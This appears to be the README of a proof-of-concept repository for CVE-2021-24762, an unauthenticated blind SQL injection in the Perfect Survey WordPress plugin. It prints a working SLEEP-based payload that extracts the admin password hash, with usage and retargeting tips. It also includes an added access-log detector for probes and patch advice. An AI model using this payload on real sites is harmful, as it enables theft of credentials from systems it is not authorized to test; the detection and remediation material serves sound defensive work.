
CVE-2021-24762 PoC — Perfect Survey < 1.5.2 - Unauthenticated SQL Injection

Title: Perfect Survey < 1.5.2 - Unauthenticated SQL Injection (CVE-2021-24762)
Description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
# exploit_cve-2021-24762
This repo contains an exploit for CVE-2021-24762. It is a blind (time-based) SQLi exploit that, in its default configuration, extracts the admin password hash.
> While doing a lab based on WordPress with the PerfectSurvey plugin, I got stuck on a SQL vulnerability. The only available PoCs I found were based on sqlmap and weren't working properly in the lab I was working on (there were a lot of additional issues, e.g. the application returning 404, timeouts varying too much, and others). So I created this to exploit the lab.

## Goals
- This PoC exploits CVE-2021-24762, a vulnerability in the WordPress plugin Perfect Survey.
  The exploit is a time-based SQL injection using SLEEP, and it obtains the password hash of the 'admin' user, which is the default user on WordPress installations.
- Where it works: Perfect Survey plugin versions < 1.5.2.

## Impact and Severity
- CVE-2021-24762: [CVSS 9.8 (Critical)]
- Impacts: confidentiality, integrity, availability, unauthorized access.

## Environment 
- Software requirements: Python 3.

## How to use
```
 ____     _      ___   ____
 / ___|   / \    |_ _| / ___|
| |      / _ \    | |  \___ \
| |___  / ___ \   | |   __ ) |
 \____|/_/   \_\ |___| |____/

   CAIS - Inteligência em Cibersegurança
   Exploit for: CVE-2021-24762

usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]

Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL (default: http://192.168.10.10)
  -p, --path PATH       path (default: /wp-admin/admin-ajax.php)
  -d, --delay DELAY     delay in seconds (default: 30)
  -t, --timeout TIMEOUT
                        timeout in seconds (default: delay + 15)
  -c, --charset CHARSET
                        charset to be used (default: alnum + ./$_-@)
  -m, --max-len MAX_LEN
                        maximum length (default: 20)
  -v, --verbose         activates log debugging
```
1. The Python script receives the parameters above; any that are not passed take their default values.
2. Ideally, you need to pass at least the URL, with -u or --url. The other parameters will probably work with their defaults.
3. In the default configuration, it retrieves the password hash of the user admin. This is set in the payload variable, in the value compared with user_login:
`payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"`

    If you need the hash of another user, change "0x61646d696e" (the hex encoding of admin) accordingly.

## Risks and limitations
- Limitation: in its current configuration, this PoC only retrieves password hashes from WordPress installations with the default database structure (for example the `wp_users` table name used in the payload). If you face a modified environment, you need to adjust this payload:
    `payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"`

## Mitigation and remediation (recommendations)
- Mitigation recommendations: Update plugin to version 1.5.2 and above.
- References: 
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24762
    - https://www.getperfectsurvey.com/ 
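Until the plugin is updated, a defender can at least spot probing of the vulnerable action in web-server access logs. The following detector is an added example, not code from this repository: it assumes the combined access-log format, uses the path, action and parameter names from the advisory above, and runs over constructed sample log lines. It flags any `get_question` request whose `question_id` is not a plain integer (the only value that parameter should ever carry) and marks requests that contain time-based tokens such as the `SLEEP` the PoC relies on. Because a blind, character-by-character extraction needs many requests (roughly charset size times maximum length), it also counts findings per source IP.

```python
"""Access-log detector for CVE-2021-24762 probing (Perfect Survey < 1.5.2).

Added example; not part of the PoC repository. Assumes the Apache/Nginx
"combined" log format. Sample log lines are constructed.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Combined log format (assumed): ip ident user [time] "METHOD TARGET PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Tokens typical of time-based blind injection; the PoC on this page is SLEEP-based.
TIME_BASED = re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR)\b", re.IGNORECASE)

# Endpoint and action named in the advisory.
VULN_PATH = "/wp-admin/admin-ajax.php"
VULN_ACTION = "get_question"

# Constructed sample lines: one benign lookup, one unrelated request,
# one time-based probe and one quote-based probe from the same client.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2025:12:00:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=get_question&question_id=7 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2025:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2025:12:00:02 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=get_question&question_id=1%20AND%20SLEEP%2830%29 HTTP/1.1" 200 812 "-" "python-requests/2.31"',
    '198.51.100.23 - - [10/Oct/2025:12:00:33 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=get_question&question_id=1%27 HTTP/1.1" 200 812 "-" "python-requests/2.31"',
]


def classify(line):
    """Return a finding dict for a suspicious get_question request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != VULN_PATH:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if params.get("action", [""])[0] != VULN_ACTION:
        return None
    qid = params.get("question_id", [""])[0]
    if re.fullmatch(r"\d+", qid):
        return None  # well-formed integer id: the only shape this parameter should have
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "question_id": qid,
        # A 200 status is expected even for injected requests: the leak is in the
        # response *time*, not the body, so status codes alone do not reveal it.
        "status": m.group("status"),
        "time_based": bool(TIME_BASED.search(qid)),
    }


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in (classify(line) for line in lines) if f]


def summarize(findings):
    """Findings per source IP; a blind extraction produces many hits from one client."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} time_based={h["time_based"]} question_id={h["question_id"]!r}')
    print("per-IP counts:", summarize(hits))
```

Run against real logs, the per-IP count is the more reliable signal: a single malformed `question_id` may be a scanner, but hundreds of them from one address spaced by the configured delay are the extraction loop this PoC performs. The same integer-only check the detector applies is what the patched plugin should enforce server-side before the value reaches any SQL statement.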


## Warning and authorizations
**Restricted use** — This repo contains sensitive content intended for ethical and responsible use only.
Remember that you must have written permission from the owner of the system you are testing. Any use outside this scope is not allowed, and the responsibility will be yours (do you want to go to jail?).


## Repo structure
- `exploit_cve-2021-24762.py` — Exploit.
- `README.md` — This file.

## Changelog
`2025-10-10 — c4cnm — Creation and initial modifications`


## Contact
- Author: Red Team CAIS / Matheus Camargo (c4cnm), matheus.camargo@rnp.br.



## License
`GNU General Public License v3 (GPL)`



File Snapshot

```
[4.0K] /data/pocs/b24405bebca539ee5e077e59d8a43d1716bbc0e4
├── [6.4K] exploit_cve-2021-24762.py
├── [ 34K] LICENSE
└── [3.9K] README.md

1 directory, 3 files
```